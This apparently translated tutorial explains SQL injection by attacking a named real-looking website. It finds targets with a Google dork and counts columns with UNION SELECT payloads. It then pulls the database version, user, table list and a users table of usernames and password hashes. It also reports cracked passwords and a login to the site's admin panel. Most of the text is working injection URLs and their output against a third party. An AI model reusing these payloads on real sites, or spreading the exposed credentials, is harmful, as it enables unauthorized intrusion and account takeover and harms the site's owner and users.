Principles of SQL injection and SQL Injection
After successful SQL injection, you may obtain all the information of the target database!
First, find the target URL to test the vulnerability.
Search in google: inurl: news. php? Id = 2
Enter a URL at any point: append an SQL statement to the URL. If an error is reported, OK is displayed and can be injected. If no error is reported, no injection vulnerability is found or not found.
For example, find a URL: http://www.calidus.ro/en/news.php? Id = 2
Change the link to the following:
http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1--http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2--http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3--http://www.calidus.ro/en/news.php?id=2 UNION SELECT 1,2,3,4--
The first three will prompt the following information:
Query failed: The used SELECT statements have a different number of columns
Because the number of columns in the union query must be the same, we can see that the normal query is four columns.
In addition to the fourth normal article
24
Note that although 1 and 3 are queried but not displayed, we can use 2 and 4 fields.
http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,database()--
5.1.70-logcaliduzb_calidussql
The above shows the database version and current database name.
Next, find the database user name.
http://www.calidus.ro/en/news.php?id=2%20UNION%20SELECT%201,version(),3,user()--
5.1.70-logcaliduzb_calidus@localhost
The password () function is not supported in this version and cannot be found for the moment.
The following SQL queries all the tables in the current database.
http://www.calidus.ro/en/news.php?id=2 union select1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()--
2
about,about_de,about_en,categories,categories_de,categories_en,contact,contact_de,contact_en,customers,eco,eco_de,eco_en,faq,faq_de,faq_en,forum_answer,forum_question,galleries,gallery,gallery_de,gallery_en,gallery_images,imp,mission,mission_de,mission_en,news,news_de,news_en,pellets,pellets_de,pellets_en,prices,products,products_de,products_en,projects,projects_de,projects_en,special_offers,special_offers_de,special_offers_en,support,support_de,support_en,users,vizion,vizion_de,vizion_en
To see a users table, first look at the field:
http://www.calidus.ro/en/news.php?id=2 union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name='users'--
user_id,user_type,user_regdate,username,user_password,user_email,user_lastvisit,user_last_confirm_key,user_new_privmsg,logcode,username_clean
Username and password fields are available.
Check the user name and password.
http://www.calidus.ro/en/news.php?id=2 union select 1,username,3,user_password from users--
dexmoda0dbde9503e13437db0f854b0b72a73badmin63a9f0ea7bb98050796b649e85481845miladro122f961db675f6a45b998594471a990b
The username is in plaintext and the password has been hashed. The decrypted website was found to be marjan and root.
Go to the website management page to manage the website. (You have sent an email to your website to inform you of the SQL injection vulnerability)